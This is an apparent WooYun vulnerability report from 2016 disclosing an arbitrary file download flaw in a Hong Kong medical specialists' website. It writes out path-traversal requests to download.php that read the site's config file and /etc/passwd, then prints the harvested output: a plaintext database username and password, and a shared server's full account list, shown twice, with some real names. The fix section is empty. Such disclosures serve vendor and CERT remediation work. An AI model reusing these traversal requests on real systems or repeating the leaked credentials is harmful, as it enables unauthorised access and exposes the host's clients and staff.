当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169166

漏洞标题:亞洲專科醫生設計缺陷任意文件下載(香港地區)

相关厂商:亞洲專科醫生

漏洞作者: 路人甲

提交时间:2016-01-13 12:02

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-13: 细节已通知厂商并且等待厂商处理中
2016-01-14: 厂商已经确认,细节仅向厂商公开
2016-01-24: 细节向核心白帽子及相关领域专家公开
2016-02-03: 细节向普通白帽子公开
2016-02-13: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

rt

详细说明:

目标:http://**.**.**.**
构造,

http://**.**.**.**/eng/download.php?file=/eng/download.php


1.png


配置文件

http://**.**.**.**/eng/download.php?file=/include/config.php


config.php中

// Database
// Choose the database to be used
define('DB_TYPE', 'mysql');
// Web Site Name
define('SITENAME', 'asia medical specialists');
// Database Hostname
// Hostname of the database server. If you are unsure, 'localhost' works in most cases.
define('DB_HOST', 'localhost');
// Database Username
// Your database user account on the host
define('DB_USER', 'ams');
// Database Password
// Password for your database user account
define('DB_PASS', 'cl2cl2');
// Database Name
// The name of database on the host. The installer will attempt to create the database if not exist
define('DB_NAME', 'ams');
// Use persistent connection? (Yes=true No=false)
// Default is 'Yes'. Choose 'Yes' if you are unsure.
define('DB_PCONNECT', false);
// facilitate sending gz-encoded data to web browsers that support compressed web pages
//	define('GZIP_COMPRESSION', true);
define('GZIP_COMPRESSION', true);
// SMTP server
define('SMTP', '**.**.**.**');
// Administrator Name
// Name of site administrator
define('SYSTEM_MAIL_SENDER', 'asiamedical specialists');
// Administrator Email
// Email address of site administrator
define('SYSTEM_MAIL_ADDRESS', 'info@**.**.**.**');
// Mail path for templated email
define('MAIL_PATH', '/mail/');
// Number of rows to display each page
define('NUM_ROWS', '20');
// Number of rows to display in article page
define('NUM_ROWS_ARTICLE', '10');
// Current date and time in HKT timezone
define('TIMEZONE', 8);
define('NOW', gmdate('Y-m-d H:i:s', time() + TIMEZONE * 3600));
define('TABLE_ADMIN', 'admins');
define('TABLE_MENU', 'menus');
define('TABLE_PAGE', 'pages');
define('TABLE_PAGEXMENU', 'pagesxmenus');
define('TABLE_NEWS', 'news');
define('TABLE_CAT', 'categories');
define('TABLE_ARTICLE', 'articles');
define('TABLE_ARTICLEXCAT', 'articlesxcategories');
define('TABLE_ARTICLEXNEWS', 'articlesxnews');
define('TABLE_BANNER', 'banners');
define('TABLE_BANNERXMENU', 'bannersxmenus');
define('TABLE_ENROLL', 'enrollments');
define('TABLE_PROMOTION', 'promotion');
define('TABLE_POPUP', 'popup');
define('TABLE_CROSS_LINK_BANNER', 'link_banner');
define('TABLE_SUPPLEMENTARY', 'supplementary');
define('TABLE_DOCTORS_SPECIALTY', 'doctors_specialty');
define('TABLE_DOCTORS', 'doctors');
define('TABLE_CLINIC_LOCATION','clinic_location');
define('TABLE_SUBSCRIPT','subscription_box');
define('TABLE_TERMS','terms');


/etc/passwd

http://**.**.**.**/eng/download.php?file=/../../../../etc/passwd


passwd中

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:0:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/var/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:100:101:X Font Server:/etc/X11/fs:/bin/false
gdm:x:42:42::/home/gdm:/bin/false
postgres:x:40:233:PostgreSQL Server:/var/lib/pgsql:/bin/bash
mysql:x:101:234:MySQL server:/var/lib/mysql:/bin/bash
hei:x:503:502:Cheng Wing Hei:/home/cl2/hei:/bin/bash
cl2:x:504:502:**.**.**.**:/home/cl2:/bin/ftponly
ttennis:x:505:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
asiaalum:x:507:507:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
dsnworks:x:516:511:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
www997ac:x:519:516:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
cdwhy:x:521:518:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
zflites:x:528:523:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
test_cl2:x:530:99:**.**.**.**:/home/cl2/test:/bin/ftponly
manfredwong:x:531:525:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
mtmaxtoy:x:537:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
bhkhkcom:x:538:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
audioforum:x:539:530:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
cl2demo:x:544:99:**.**.**.**:/home/cl2/demo:/bin/ftponly
cl2ecard:x:545:99:**.**.**.**:/home/cl2/ecard:/bin/ftponly
unbreakable:x:549:535:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
ckmetal:x:550:536:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
www997un:x:553:541:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
newlook:x:554:542:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
cl2secure:x:555:99:**.**.**.**:/home/cl2/secure:/bin/ftponly
secred:x:556:99:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
dalmatians:x:557:543:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
emperor:x:561:547:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
kone:x:564:550:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
ivlhk:x:566:566:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
mvt:x:567:553:**.**.**.**:/home/client/**.**.**.**/:/bin/ftponly
alex:x:568:554:alex@**.**.**.**:/home/cl2/alex:/bin/bash
concept:x:571:99:concept.**.**.**.**:/home/client/concept.**.**.**.**:/bin/ftponly
named:x:25:25:Named:/var/named:/bin/false
es163net:x:506:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
kitime:x:573:558:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
tektron:x:574:559:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
puffin:x:576:561:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
ramediacorp:x:578:563:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
deltamac:x:581:565:**.**.**.**:/home/client/**.**.**.**/:/bin/ftponly
bluecd:x:583:568:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
manfredw:x:584:521:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
headlines:x:585:533:**.**.**.**:/home/client/**.**.**.**/**.**.**.**:/bin/ftponly
citibank:x:586:534:citibank.**.**.**.**:/home/client/citibank.**.**.**.**:/bin/ftponly
fishersci:x:588:538:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
deltacom:x:589:544:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
chartslogic:x:591:591:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
advancepro:x:592:569:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
rpm:x:37:37::/var/lib/rpm:/bin/false
pcap:x:77:77::/var/arpwatch:/sbin/nologin
public:x:593:502:public:/home/cl2/public:/sbin/nologin
isent:x:594:594:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
vcdwonland:x:595:570:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
tcmforum:x:597:572:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
iamwaiting:x:598:573:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
pkbox:x:601:576:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
forucorp:x:602:577:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
hkweekly:x:603:578:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
heinnaye:x:604:579:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
new-soccer:x:605:580:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
noahgrp:x:606:581:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
sshd:x:74:74::/var/empty/sshd:/bin/false
musicgal:x:609:609:music-gallery.biz:/home/client/music-gallery.biz:/bin/ftponly
hitmktg:x:611:584:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
orpheusmusic:x:612:612:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
iwake:x:613:613:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
apache:x:48:48:Apache:/var/www:/bin/false
kingsland-cdr:x:615:615:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
leadercorpinfo:x:616:585:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
lefthanded:x:617:617:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
fz9494:x:618:505:fz9494@**.**.**.**:/home/cl2/fz9494:/bin/ftponly
greatwallproductions:x:619:619:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
feliceperla:x:621:621:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
eternofashion:x:622:622:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
beautyandthebliss:x:623:623:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
hkpj:x:628:508:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
awayofimagegallery:x:631:512:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
joe:x:501:502:Joe Li:/home/cl2/joe:/bin/bash
upload:x:634:502:File Upload:/var/ftp/pub:/bin/ftponly
alvinli:x:636:549:alvinliphoto:/home/client/**.**.**.**:/bin/ftponly
bethel:x:637:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
alias:*:7790:2108::/var/qmail/alias:/bin/true
qmaild:*:7791:2108::/var/qmail:/bin/true
qmaill:*:7792:2108::/var/qmail:/bin/true
qmailp:*:7793:2108::/var/qmail:/bin/true
qmailq:*:7794:2107::/var/qmail:/bin/true
qmailr:*:7795:2107::/var/qmail:/bin/true
qmails:*:7796:2107::/var/qmail:/bin/true
vpopmail:x:89:89::/home/vpopmail:/bin/bash
qscand:x:7797:7797::/home/qscand:/bin/false
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
fred:x:7798:502::/home/cl2/fred:/bin/bash
zelox:x:7799:503::/home/client/**.**.**.**:/bin/bash
bababooo:x:7800:503::/home/client/**.**.**.**:/bin/bash
victorywines:x:7801:503::/home/client/**.**.**.**:/bin/bash
fruitspassion:x:7802:503::/home/client/fruitspassion:/bin/bash
megint:x:7803:503::/home/client/megint:/bin/bash
thirstythursday:x:7804:503::/home/client/**.**.**.**:/bin/bash
thirstythuimages:x:7805:503::/home/client/**.**.**.**/public_html/images/:/bin/bash
keepconsulting:x:7806:503::/home/client/**.**.**.**:/bin/bash
boutiquewines:x:7807:503::/home/client/**.**.**.**:/bin/bash
cl2ssl:x:7808:7808::/home/client/**.**.**.**:/bin/bash
stephenngt:x:7809:503::/home/client/**.**.**.**/public_html:/bin/bash
spusr:x:7810:503::/home/client/**.**.**.**:/bin/bash
hkcarbonreduction:x:7811:503::/home/client/**.**.**.**:/bin/bash
chungkiuuser:x:7812:503::/home/client/**.**.**.**:/bin/bash
champagnehouse:x:7813:503::/home/client/**.**.**.**:/bin/bash
ams:x:7814:503::/home/client/**.**.**.**:/bin/bash
islandgolf:x:7815:503::/home/client/**.**.**.**:/bin/bash
sagebsl:x:7816:503::/home/client/**.**.**.**/public_html:/bin/bash
cl2servlet:x:7817:503::/usr/local/tomcat/webapps/ROOT/servlet:/bin/bash
clamav:x:102:235:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
aplusgift:x:7818:503::/home/client/**.**.**.**/public_html:/bin/bash
vigftp:x:7819:503::/home/client/**.**.**.**:/bin/bash
cl2freelance:x:7820:7820::/home/cl2/public_html/dchucc/v2:/bin/bash
mldw:x:7821:503::/home/client/**.**.**.**:/bin/bash
llenergy:x:7822:503::/home/client/**.**.**.**:/bin/bash
youyuan:x:7823:503::/home/client/**.**.**.**:/bin/bash
enfalearn:x:7824:503::/home/client/**.**.**.**:/bin/bash
tcmforumnet:x:7825:503::/home/client/tcmforumnet:/bin/bash
powerz-entp:x:7826:503::/home/client/**.**.**.**:/bin/bash
ryan:x:7827:502::/home/cl2/ryan:/bin/bash
lions:x:7828:503::/home/client/**.**.**.**/public_html:/bin/bash
hkr:x:7829:503::/home/client/**.**.**.**:/bin/bash
reginahk:x:7830:503::/home/client/**.**.**.**:/bin/bash
nathanaelhk:x:7831:503::/home/client/**.**.**.**:/bin/bash
myroothk:x:7832:503::/home/client/**.**.**.**:/bin/bash
genealogyhk:x:7834:503::/home/client/**.**.**.**:/bin/bash
ivanhk:x:7835:503::/home/client/**.**.**.**:/bin/bash
redgain:x:7836:503::/home/client/**.**.**.**:/bin/bash
amssc:x:7837:503::/home/client/**.**.**.**:/bin/bash
megasmart:x:7838:503::/home/client/**.**.**.**:/bin/bash
spineandpain:x:7839:503::/home/client/**.**.**.**:/bin/bash
ytlippo:x:7840:503::/home/client/**.**.**.**:/bin/bash
cl2share:x:7841:503::/home/cl2/public_html/cl2share:/bin/bash
hkissr:x:7842:503::/home/client/**.**.**.**:/bin/bash
ripleyhk:x:7843:503::/usr/local/tomcat/webapps/ROOT/ripley:/bin/bash
hkgx:x:7844:503::/home/client/**.**.**.**:/bin/bash
kennyhuicpa:x:7845:503::/home/client/**.**.**.**:/bin/bash
medicalcatalyst:x:7846:503::/home/client/**.**.**.**:/bin/bash
hkr_so:x:7847:503::/home/client/**.**.**.**/public_html2/files/file/so_file:/bin/bash
hkr_si:x:7848:503::/home/client/**.**.**.**/public_html2/files/file/si_file:/bin/bash
hkgxsports:x:7849:503::/home/client/**.**.**.**:/bin/bash
2bglobal:x:7850:503::/home/client/**.**.**.**:/bin/bash
wilsoneyehk:x:7851:503::/home/client/**.**.**.**:/bin/bash
tcmforumcom20140812:x:7852:503::/home/client/**.**.**.**:/bin/bash
cl2usr:x:7853:503::/home/client/**.**.**.**:/bin/bash
egltours:x:7854:503::/home/client/**.**.**.**:/bin/bash
hkhserc:x:7855:503::/home/cl2/public_html/hkhserc/:/bin/bash

漏洞证明:

1.png


passwd中

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:0:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/var/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:100:101:X Font Server:/etc/X11/fs:/bin/false
gdm:x:42:42::/home/gdm:/bin/false
postgres:x:40:233:PostgreSQL Server:/var/lib/pgsql:/bin/bash
mysql:x:101:234:MySQL server:/var/lib/mysql:/bin/bash
hei:x:503:502:Cheng Wing Hei:/home/cl2/hei:/bin/bash
cl2:x:504:502:**.**.**.**:/home/cl2:/bin/ftponly
ttennis:x:505:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
asiaalum:x:507:507:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
dsnworks:x:516:511:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
www997ac:x:519:516:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
cdwhy:x:521:518:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
zflites:x:528:523:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
test_cl2:x:530:99:**.**.**.**:/home/cl2/test:/bin/ftponly
manfredwong:x:531:525:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
mtmaxtoy:x:537:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
bhkhkcom:x:538:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
audioforum:x:539:530:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
cl2demo:x:544:99:**.**.**.**:/home/cl2/demo:/bin/ftponly
cl2ecard:x:545:99:**.**.**.**:/home/cl2/ecard:/bin/ftponly
unbreakable:x:549:535:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
ckmetal:x:550:536:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
www997un:x:553:541:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
newlook:x:554:542:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
cl2secure:x:555:99:**.**.**.**:/home/cl2/secure:/bin/ftponly
secred:x:556:99:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
dalmatians:x:557:543:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
emperor:x:561:547:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
kone:x:564:550:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
ivlhk:x:566:566:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
mvt:x:567:553:**.**.**.**:/home/client/**.**.**.**/:/bin/ftponly
alex:x:568:554:alex@**.**.**.**:/home/cl2/alex:/bin/bash
concept:x:571:99:concept.**.**.**.**:/home/client/concept.**.**.**.**:/bin/ftponly
named:x:25:25:Named:/var/named:/bin/false
es163net:x:506:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
kitime:x:573:558:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
tektron:x:574:559:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
puffin:x:576:561:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
ramediacorp:x:578:563:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
deltamac:x:581:565:**.**.**.**:/home/client/**.**.**.**/:/bin/ftponly
bluecd:x:583:568:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
manfredw:x:584:521:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
headlines:x:585:533:**.**.**.**:/home/client/**.**.**.**/**.**.**.**:/bin/ftponly
citibank:x:586:534:citibank.**.**.**.**:/home/client/citibank.**.**.**.**:/bin/ftponly
fishersci:x:588:538:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
deltacom:x:589:544:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
chartslogic:x:591:591:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
advancepro:x:592:569:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
rpm:x:37:37::/var/lib/rpm:/bin/false
pcap:x:77:77::/var/arpwatch:/sbin/nologin
public:x:593:502:public:/home/cl2/public:/sbin/nologin
isent:x:594:594:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
vcdwonland:x:595:570:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
tcmforum:x:597:572:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
iamwaiting:x:598:573:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
pkbox:x:601:576:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
forucorp:x:602:577:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
hkweekly:x:603:578:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
heinnaye:x:604:579:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
new-soccer:x:605:580:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
noahgrp:x:606:581:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
sshd:x:74:74::/var/empty/sshd:/bin/false
musicgal:x:609:609:music-gallery.biz:/home/client/music-gallery.biz:/bin/ftponly
hitmktg:x:611:584:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
orpheusmusic:x:612:612:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
iwake:x:613:613:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
apache:x:48:48:Apache:/var/www:/bin/false
kingsland-cdr:x:615:615:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
leadercorpinfo:x:616:585:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
lefthanded:x:617:617:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
fz9494:x:618:505:fz9494@**.**.**.**:/home/cl2/fz9494:/bin/ftponly
greatwallproductions:x:619:619:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
feliceperla:x:621:621:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
eternofashion:x:622:622:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
beautyandthebliss:x:623:623:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
hkpj:x:628:508:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
awayofimagegallery:x:631:512:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
joe:x:501:502:Joe Li:/home/cl2/joe:/bin/bash
upload:x:634:502:File Upload:/var/ftp/pub:/bin/ftponly
alvinli:x:636:549:alvinliphoto:/home/client/**.**.**.**:/bin/ftponly
bethel:x:637:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponly
alias:*:7790:2108::/var/qmail/alias:/bin/true
qmaild:*:7791:2108::/var/qmail:/bin/true
qmaill:*:7792:2108::/var/qmail:/bin/true
qmailp:*:7793:2108::/var/qmail:/bin/true
qmailq:*:7794:2107::/var/qmail:/bin/true
qmailr:*:7795:2107::/var/qmail:/bin/true
qmails:*:7796:2107::/var/qmail:/bin/true
vpopmail:x:89:89::/home/vpopmail:/bin/bash
qscand:x:7797:7797::/home/qscand:/bin/false
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
fred:x:7798:502::/home/cl2/fred:/bin/bash
zelox:x:7799:503::/home/client/**.**.**.**:/bin/bash
bababooo:x:7800:503::/home/client/**.**.**.**:/bin/bash
victorywines:x:7801:503::/home/client/**.**.**.**:/bin/bash
fruitspassion:x:7802:503::/home/client/fruitspassion:/bin/bash
megint:x:7803:503::/home/client/megint:/bin/bash
thirstythursday:x:7804:503::/home/client/**.**.**.**:/bin/bash
thirstythuimages:x:7805:503::/home/client/**.**.**.**/public_html/images/:/bin/bash
keepconsulting:x:7806:503::/home/client/**.**.**.**:/bin/bash
boutiquewines:x:7807:503::/home/client/**.**.**.**:/bin/bash
cl2ssl:x:7808:7808::/home/client/**.**.**.**:/bin/bash
stephenngt:x:7809:503::/home/client/**.**.**.**/public_html:/bin/bash
spusr:x:7810:503::/home/client/**.**.**.**:/bin/bash
hkcarbonreduction:x:7811:503::/home/client/**.**.**.**:/bin/bash
chungkiuuser:x:7812:503::/home/client/**.**.**.**:/bin/bash
champagnehouse:x:7813:503::/home/client/**.**.**.**:/bin/bash
ams:x:7814:503::/home/client/**.**.**.**:/bin/bash
islandgolf:x:7815:503::/home/client/**.**.**.**:/bin/bash
sagebsl:x:7816:503::/home/client/**.**.**.**/public_html:/bin/bash
cl2servlet:x:7817:503::/usr/local/tomcat/webapps/ROOT/servlet:/bin/bash
clamav:x:102:235:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
aplusgift:x:7818:503::/home/client/**.**.**.**/public_html:/bin/bash
vigftp:x:7819:503::/home/client/**.**.**.**:/bin/bash
cl2freelance:x:7820:7820::/home/cl2/public_html/dchucc/v2:/bin/bash
mldw:x:7821:503::/home/client/**.**.**.**:/bin/bash
llenergy:x:7822:503::/home/client/**.**.**.**:/bin/bash
youyuan:x:7823:503::/home/client/**.**.**.**:/bin/bash
enfalearn:x:7824:503::/home/client/**.**.**.**:/bin/bash
tcmforumnet:x:7825:503::/home/client/tcmforumnet:/bin/bash
powerz-entp:x:7826:503::/home/client/**.**.**.**:/bin/bash
ryan:x:7827:502::/home/cl2/ryan:/bin/bash
lions:x:7828:503::/home/client/**.**.**.**/public_html:/bin/bash
hkr:x:7829:503::/home/client/**.**.**.**:/bin/bash
reginahk:x:7830:503::/home/client/**.**.**.**:/bin/bash
nathanaelhk:x:7831:503::/home/client/**.**.**.**:/bin/bash
myroothk:x:7832:503::/home/client/**.**.**.**:/bin/bash
genealogyhk:x:7834:503::/home/client/**.**.**.**:/bin/bash
ivanhk:x:7835:503::/home/client/**.**.**.**:/bin/bash
redgain:x:7836:503::/home/client/**.**.**.**:/bin/bash
amssc:x:7837:503::/home/client/**.**.**.**:/bin/bash
megasmart:x:7838:503::/home/client/**.**.**.**:/bin/bash
spineandpain:x:7839:503::/home/client/**.**.**.**:/bin/bash
ytlippo:x:7840:503::/home/client/**.**.**.**:/bin/bash
cl2share:x:7841:503::/home/cl2/public_html/cl2share:/bin/bash
hkissr:x:7842:503::/home/client/**.**.**.**:/bin/bash
ripleyhk:x:7843:503::/usr/local/tomcat/webapps/ROOT/ripley:/bin/bash
hkgx:x:7844:503::/home/client/**.**.**.**:/bin/bash
kennyhuicpa:x:7845:503::/home/client/**.**.**.**:/bin/bash
medicalcatalyst:x:7846:503::/home/client/**.**.**.**:/bin/bash
hkr_so:x:7847:503::/home/client/**.**.**.**/public_html2/files/file/so_file:/bin/bash
hkr_si:x:7848:503::/home/client/**.**.**.**/public_html2/files/file/si_file:/bin/bash
hkgxsports:x:7849:503::/home/client/**.**.**.**:/bin/bash
2bglobal:x:7850:503::/home/client/**.**.**.**:/bin/bash
wilsoneyehk:x:7851:503::/home/client/**.**.**.**:/bin/bash
tcmforumcom20140812:x:7852:503::/home/client/**.**.**.**:/bin/bash
cl2usr:x:7853:503::/home/client/**.**.**.**:/bin/bash
egltours:x:7854:503::/home/client/**.**.**.**:/bin/bash
hkhserc:x:7855:503::/home/cl2/public_html/hkhserc/:/bin/bash

修复方案:

..

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-14 16:52

厂商回复:

已將事件通知有關機構

最新状态:

暂无